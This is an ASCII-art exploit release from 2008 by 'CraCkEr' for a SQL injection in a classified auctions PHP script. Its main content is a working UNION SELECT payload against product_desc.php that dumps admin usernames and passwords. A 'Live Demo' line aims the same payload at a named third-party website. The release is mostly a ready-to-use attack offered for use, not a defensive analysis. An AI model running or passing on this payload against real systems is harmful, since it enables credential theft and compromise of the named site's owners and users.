┌┌────────────────────────────────────────────────────────────────────────────┐
││                             C r a C k E r                                 ┌┘
┌┘          T H E   C R A C K   O F   E T E R N A L   M I G H T              ││
└────────────────────────────────────────────────────────────────────────────┘┘

 ┌────      From The Ashes and Dust Rises An Unimaginable crack....       ────┐
┌┌────────────────────────────────────────────────────────────────────────────┐
┌┘                           [ Remote SQL Injection ]                        ┌┘
└────────────────────────────────────────────────────────────────────────────┘┘
: Author   : CraCkEr                   : :                                    :
│ Group    : N/A                       │ │                                    │
│ Script   : Classified Auctions Script│ │         Register Globals :         │
│ Download : pozscripts.com            │ │                                    │
│ Critical : High [░░▒▒▓▓██]           │ │          [█] ON   [ ] OFF          │
│                                      │ │                                    │
│ ─────────────────────────────────────┘ └─────────────────────────────────── │
│                              DALnet #crackers                              ┌┘
└────────────────────────────────────────────────────────────────────────────┘┘
:                                                                             :
│  Release Notes:                                                             │
│  ═════════════                                                              │
│  Typically used for remotely exploitable vulnerabilities that can lead to   │
│  system compromise.                                                         │
│                                                                             │

┌┌────────────────────────────────────────────────────────────────────────────┐
┌┘                             Exploit URL's                                 ┌┘
└────────────────────────────────────────────────────────────────────────────┘┘

[SQL]

www.localhost/product_desc.php?id=-1 UNION SELECT 1,2,concat(admin_name,0x3a,pwd),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36 FROM savoirs_militaria.freetplauctions_admin--

Live Demo:

http://bourses-aux-armes.com/product_desc.php?id=-1 UNION SELECT 1,2,concat(admin_name,0x3a,pwd),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36 FROM savoirs_militaria.freetplauctions_admin--



└─────────────────────────────────────────────────────────────────────────────┘
 
Greets:
       The_PitBull, Raz0r, iNs, Sad, His0k4, Hussin X .




┌┌────────────────────────────────────────────────────────────────────────────┐
┌┘                              © CraCkEr 2008                              ┌┘
└────────────────────────────────────────────────────────────────────────────┘┘